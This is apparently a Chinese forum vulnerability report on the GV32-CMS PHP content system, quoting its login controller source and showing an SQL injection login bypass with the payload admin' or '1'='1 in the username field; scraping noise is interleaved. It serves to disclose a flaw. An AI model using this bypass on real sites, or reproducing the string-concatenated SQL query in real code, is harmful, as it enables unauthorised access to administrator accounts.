|
0x01 简要描述:8 e6 T, C6 E5 l/ {% ~ J4 I
GV32-CMS免费开源企业建站系统,是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业企业建站系统。软件具执行效率高、模板自由切换、后台管理功能方便等诸多优秀特点。全部代码都为GV32.COM原创,有着完全的知识产权。凭借 GV32.COM的不断创新精神和认真的工作态度,GV32-CMS企业建站系统已成国内外同类软件中的最好用的企业建站系统。 D& k$ G, }* h4 a0 Y% o
0x02 详细说明: - <?php
- if (!defined('GV32_COM')) exit('GV32.COM No direct script access allowed');
- class Login
- {
- function Login()
- {
- //echo 'Login';
- }
- function act( )
- {
- //缓存一天 //60 * 60 * 24 缓存时间 一天
- $GLOBALS['Templ'] -> caching = true;
- $GLOBALS['Templ'] -> cache_lifetime = 86400 ;
- $GLOBALS['Templ'] -> assign('copyright',COPYRIGHT); //版权
- $GLOBALS['Templ'] -> assign('actUrl',EMPLOYEE_WEBURL."/login.php?load=login&act=actlogin");
- $GLOBALS['Templ'] -> display('login_tpl.html');
- }
- function actlogin( )
- {
- echo $use_nameval = $GLOBALS['Reque'] -> funpost("use_name");
- $use_pwdval = $GLOBALS['Reque'] -> funpost("use_pwd");
- $use_captchaval = $GLOBALS['Reque'] -> funpost("use_captcha");
- $this -> logincount();
- if($use_captchaval!=$_SESSION["Img"])
- {
- $GLOBALS['Templ'] -> assign('infomessage',$GLOBALS['_LANG']['bd_captchaerror']);
- $GLOBALS['Templ'] -> assign('URL_TIME',URL_TIME);
- $GLOBALS['Templ'] -> assign('geturl',EMPLOYEE_WEBURL."/login.php?load=login&act=act");
- $GLOBALS['Templ'] -> display('suggestion_tpl.html');
- }else{
- $sqlQuery = " SELECT use_id,use_name,use_email FROM ".SQL_PREFIX."user WHERE use_name= '".$use_nameval."' AND use_pwd = '".md5($use_pwdval)."' and use_enabled = 1 LIMIT 1 ";
- //exit();
- $adminInfo["emplyeeUser"] = $GLOBALS['MySql'] -> selectOne($sqlQuery);
- if($adminInfo["emplyeeUser"]["use_id"])
- {
- $GLOBALS['WebSe'] -> SetSession( $adminInfo );
- $nowtime = time();
- $adminip = $GLOBALS['Helpe'] -> getip();
- //登录成功更新用户信息
- $sqlup = " UPDATE ".SQL_PREFIX."user set use_logcount = use_logcount +1 , use_loginip = '".$adminip."', use_logintime = ".$nowtime." WHERE use_name= '".$use_nameval."' and use_id = ".$adminInfo["emplyeeUser"]["use_id"]." LIMIT 1 " ;
- $GLOBALS['MySql'] -> querySql($sqlup);
- //登录成功!重置IP错误信息清0!
- $updateip = "UPDATE `".SQL_PREFIX."loginerror` SET errorcount = 0 WHERE ip_address = '".$adminip."' AND logtype = 'login' ";
- $GLOBALS['MySql'] -> querySql( $updateip );
- $GLOBALS['Templ'] -> assign('infomessage',$GLOBALS['_LANG']['bd_loginsusse']);
- $GLOBALS['Templ'] -> assign('URL_TIME',URL_TIME);
- $GLOBALS['Templ'] -> assign('geturl',EMPLOYEE_WEBURL);
- $GLOBALS['Templ'] -> display('suggestion_tpl.html');
- //var_dump($_SESSION);
- }else{
- $GLOBALS['Templ'] -> assign('infomessage',$GLOBALS['_LANG']['bd_usererror']);
- $GLOBALS['Templ'] -> assign('URL_TIME',URL_TIME);
- $GLOBALS['Templ'] -> assign('geturl',EMPLOYEE_WEBURL."/login.php?load=login&act=act");
- $GLOBALS['Templ'] -> display('suggestion_tpl.html');
- /*
- header("location:".EMPLOYEE_WEBURL."/login.php?load=login&act=act");
- exit();
- */
- }
- }
- }
- function logincount()
- {
- $adminip = $GLOBALS['Helpe'] -> getip();
- $now = time();
- if( $adminip!='Unknown' and $adminip!='' )
- {
- //查询记录是否存在
- $sqlip = " SELECT error_id , session_id , errorcount , start_time FROM ".SQL_PREFIX."loginerror WHERE ip_address = '".$adminip."' AND logtype = 'login' LIMIT 1 ";
- $useripInfo = $GLOBALS['MySql'] -> selectOne($sqlip);
- if($useripInfo["error_id"])
- {
- //超过一天。重置时间及数量
- if( $useripInfo["start_time"] > ( $now + 86400 ) )
- {
- $updateip = "UPDATE `".SQL_PREFIX."loginerror` SET `session_id` = '".$_SESSION["session_id"]."' , start_time ='".$now."' ,errorcount = '1' WHERE ip_address = '".$adminip."' AND logtype = 'login' ";
- $GLOBALS['MySql'] -> querySql($updateip);
- }elseif( $useripInfo["errorcount"] >= 20 )
- {
- $updateip = "UPDATE `loginerror` SET errorcount = errorcount + 1 WHERE ip_address = '".$adminip."' AND logtype = 'login' ";
- $GLOBALS['MySql'] -> querySql( $updateip );
- $GLOBALS['Templ'] -> assign('infomessage',$GLOBALS['_LANG']['bd_tomorrowerror']);
- $GLOBALS['Templ'] -> assign('URL_TIME',URL_TIME);
- $GLOBALS['Templ'] -> assign('geturl',EMPLOYEE_WEBURL."/login.php?load=login&act=act");
- $GLOBALS['Templ'] -> display('suggestion_tpl.html');
- exit();
- }else{
- if( $useripInfo["errorcount"] < 5 )
- {
- $updateip = "UPDATE `".SQL_PREFIX."loginerror` SET errorcount = errorcount + 1 WHERE ip_address = '".$adminip."' AND logtype = 'login' ";
- $GLOBALS['MySql'] -> querySql($updateip);
- }elseif( $useripInfo["start_time"] > ( $now - 3600) )
- {
- $updateip = "UPDATE `".SQL_PREFIX."loginerror` SET errorcount = errorcount + 1 WHERE ip_address = '".$adminip."' AND logtype = 'login' ";
- $GLOBALS['MySql'] -> querySql($updateip);
- $GLOBALS['Templ'] -> assign('infomessage',$GLOBALS['_LANG']['bd_counterror']);
- $GLOBALS['Templ'] -> assign('URL_TIME',URL_TIME);
- $GLOBALS['Templ'] -> assign('geturl',EMPLOYEE_WEBURL."/login.php?load=login&act=act");
- $GLOBALS['Templ'] -> display('suggestion_tpl.html');
- exit();
- }else{
- $updateip = "UPDATE `".SQL_PREFIX."loginerror` SET errorcount = errorcount + 1 ,session_id = '".$_SESSION["session_id"]."' WHERE ip_address = '".$adminip."' AND logtype = 'login' ";
- $GLOBALS['MySql'] -> querySql($updateip);
- }
- }
- //时间未超过1小时,状态有效,数量是否超过5次
- //未超过5次更新+1
- }else{
- $insertip ="INSERT INTO `".SQL_PREFIX."loginerror` (`session_id` , `errorcount` , `ip_address` , `start_time` , `logtype` ) VALUES ( '".$_SESSION["session_id"]."', '1', '$adminip', '$now', 'login')";
- $GLOBALS['MySql'] -> querySql($insertip);
- }
- }else{
- $GLOBALS['Templ'] -> assign('infomessage',$GLOBALS['_LANG']['bd_syserror']);
- $GLOBALS['Templ'] -> assign('URL_TIME',URL_TIME);
- $GLOBALS['Templ'] -> assign('geturl',EMPLOYEE_WEBURL."/login.php?load=login&act=act");
- $GLOBALS['Templ'] -> display('suggestion_tpl.html');
- exit();
- }
- }
- }
- $Login = new Login();
- ?>
* [" a+ d% v2 @" ?& Z( D
4 n2 g8 K1 \, ]+ B复制代码1 _% M. U+ @. u& Y& w, k
经典语句重现 - $sqlQuery = " SELECT use_id,use_name,use_email FROM ".SQL_PREFIX."user WHERE use_name= '".$use_nameval."' AND use_pwd = '".md5($use_pwdval)."' and use_enabled = 1 LIMIT 1 ";4 ?+ p; ?$ r; r/ l+ f
9 V0 L$ ~ a3 d$ s$ V复制代码
) N9 m5 Y. W2 ?% O9 x% I; Q原本以为注释就完事了 后来发现被过滤l 再看funpost函数 ; w/ s( E0 @( W/ b% k. Y- s
& S9 n' q4 ]& R5 i# I1 N
, K3 B' x! M7 ], y# `' C0 n. T* \
* H: V% s4 a# ~1 V7 V0 D
0x03 漏洞证明:
, Z, k# w. d5 Y% O8 q( s. E0 _' j登录用户处填写 admin' or '1'='1
O8 `- s; V* \' W' C% `; E- x+ ?$ {' O# g6 r" @9 h7 k
2 g; M7 x+ r9 ]! c' U$ A. s: S1 b0 }& b8 k: @1 V/ ]: c& g
' C' j& k1 I( @+ |1 F+ c, z |
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有帐号?立即注册
x
|